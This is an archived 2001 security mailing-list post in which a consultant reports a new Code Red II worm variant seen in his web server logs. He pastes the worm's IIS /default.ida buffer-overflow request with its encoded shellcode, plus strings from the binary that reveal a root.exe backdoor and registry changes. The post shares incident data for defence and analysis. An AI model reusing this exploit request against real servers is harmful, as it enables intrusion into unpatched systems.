Hello all, I'm sorry if this is old news: but is there a new variant going around? My logs just started showing entries with the signature /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX... instead of the /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN... that we've been used to. I know there is a CRv2, but I cannot find any references to a different signature. I've captured the entire request, and though the % code is all the same, the payload is different. This is the "strings" output on the binary: ---------------------------------------------------------------------- GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 CodeRedII F4)E Th~f Th~f ;MZu KERNu EL32u GetPu rocAu D$$dg LoadLibraryA CreateThread GetTickCount Sleep GetSystemDefaultLangID GetSystemDirectoryA CopyFileA GlobalFindAtomA GlobalAddAtomA CloseHandle _lcreat _lwrite _lclose GetSystemTime WS2_32.DLL socket closesocket ioctlsocket connect select send recv gethostname gethostbyname WSAGetLastError USER32.DLL ExitWindowsEx \CMD.EXE d:\inetpub\scripts\root.exe d:\progra~1\common~1\system\MSADC\root.exe hT @ hH @ hX @ t6Ff %`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@ \EXPLORER.EXE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC c:\,,217 d:\,,217 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExA RegCloseKey d:\explorer.exe 8>u'j ---------------------------------------------------------------------- The 3818 byte capture file is on my web server if anybody wants to poke around: http://www.unixwiz.net/misc/codered.bin Thanks to dwmorris at DSLReports.com for the heads up on this. Steve --- Stephen J Friedl | Software Consultant | Tustin, CA | +1 714 544-6561 www.unixwiz.net | I speak for me only | KA8CMY | steveat_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:45:22 PDT